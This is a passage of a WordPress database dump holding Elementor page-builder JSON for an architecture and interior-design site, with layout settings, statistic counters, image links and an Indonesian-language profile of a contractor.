us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3973,4886,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3974,4886,'_elementor_pro_version','3.8.1'),(3975,4887,'_wp_page_template','elementor_header_footer'),(3976,4887,'_elementor_edit_mode','builder'),(3977,4887,'_elementor_template_type','wp-page'),(3978,4887,'_elementor_version','3.8.1'),(3979,4887,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/file-1.jpg\",\"id\":4884,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"John Alan\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.<\\/p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Let\'s turn your ideas\\ninto reality\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or WhatsApp: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"0822 9777 5589\",\"phone_address\":\"082297775589\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":400},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Commercial\",\"number\":100,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Residential\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Office\",\"number\":100,\"icon\":{\"value\":\"flaticon flaticon-building\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(3980,4887,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3981,4887,'_elementor_pro_version','3.8.1'),(3982,4888,'_wp_page_template','default'),(3983,4888,'_elementor_edit_mode','builder'),(3984,4888,'_elementor_template_type','wp-post'),(3985,4888,'_elementor_version','3.8.1'),(3986,4888,'_elementor_data','[{\"id\":\"ef331a9\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/lines.png\",\"id\":139,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"initial\",\"background_overlay_xpos\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"%\",\"size\":135,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"%\",\"size\":145,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"%\",\"size\":-450,\"sizes\":[]},\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"auto\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.04,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_position_mobile\":\"initial\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"7d36326\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":58.992,\"content_position\":\"top\",\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"120\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"117\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bce0c3f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Le\'t turn your ideas into reality\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"bold\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e5254c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[mc4wp_form 